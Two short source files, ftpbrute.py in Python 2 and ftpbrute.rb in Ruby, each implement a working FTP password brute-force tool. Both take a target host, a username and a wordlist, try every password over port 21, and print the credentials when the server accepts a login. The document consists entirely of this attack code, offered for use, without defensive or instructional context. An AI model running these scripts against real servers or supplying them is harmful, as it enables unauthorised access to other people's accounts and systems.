File: ftpbrute.py
#! /usr/bin/python

import socket
import sys

if len(sys.argv) != 4:
	print "usage: ./ftpbrute.py [TARGET] [USERNAME] [WORDLIST]"
	sys.exit(1)

rhost = sys.argv[1]
user = sys.argv[2]
wordlist = sys.argv[3]

def checkHost(host):
	print "checking host... ",; sys.stdout.flush()
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		result = s.connect_ex((host, 21))
		if result == 0:
			print 'success'
		else:
			print 'fail'
			sys.exit(1)
	except:
		print 'fail'
		sys.exit(1)

def getWordlist(path):
	print 'reading wordlist... ',; sys.stdout.flush()
	try:
		with open(path) as file:
			wordlist = file.read().strip().split('\n')
			print 'done'
			return wordlist
	except:
		print 'fail'
		sys.exit(1)

def crackPass(passwd):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((rhost, 21))
	s.recv(1024)
	s.send('USER %s\n' %(user))
	s.recv(1024)
	s.send('PASS %s\n' %(passwd))
	data = s.recv(1024)
	if '230' in data:
		print 'creds found: '
		print '\tuser: %s' %(user)
		print '\tpass: %s' %(passwd)
		sys.exit(1)

wordlist = getWordlist(wordlist)
checkHost(rhost)

print 'cracking FTP pass for "%s" at %s...\n' %(user, rhost)

for i in wordlist:
	crackPass(i)

print 'bruteforce failed'

File: ftpbrute.rb
#! /usr/bin/ruby

require 'socket'
require 'timeout'

if ARGV.length != 3
	puts "usage: ./ftpbrute.rb [TARGET] [USERNAME] [WORDLIST]"
	exit
end

$rhost = ARGV[0]
$user = ARGV[1]
$path = ARGV[2]

def checkHost()
	print 'checking host... '
		s = Socket.new Socket::AF_INET, Socket::SOCK_STREAM
		sockaddr = Socket.pack_sockaddr_in(21, $rhost)
		timeout(10) do
			@result = s.connect(sockaddr)
		end
		if @result == 0
			puts 'success'
		else
			puts 'fail'
			exit
		end

end

def getWordlist()
	print 'reading wordlist... '
	begin
		file = File.open($path, 'r')
		$wordlist = file.read.chomp.split("\n")
		file.close
		puts 'done'
	rescue
		puts 'fail'
		exit
	end
end

def crackPass(pass)
        begin
                s = TCPSocket.new($rhost, 21)
                s.gets
                s.puts("USER #{$user}")
                s.gets
                s.puts("PASS #{pass}")
                data = s.gets
                s.close
                if data.include? '230'
                        return true
                else
                        return false
                end
        rescue
                return false
        end
end

getWordlist()
checkHost()

puts "cracking FTP pass for \"#{$user}\" at #{$rhost}... \n\n"

$wordlist.each do |pass|
	if crackPass(pass)
		puts 'creds found:'
		puts "\tuser: #{$user}"
		puts "\tpass: #{pass}"
		exit
	end
end

puts "bruteforce failed"
		
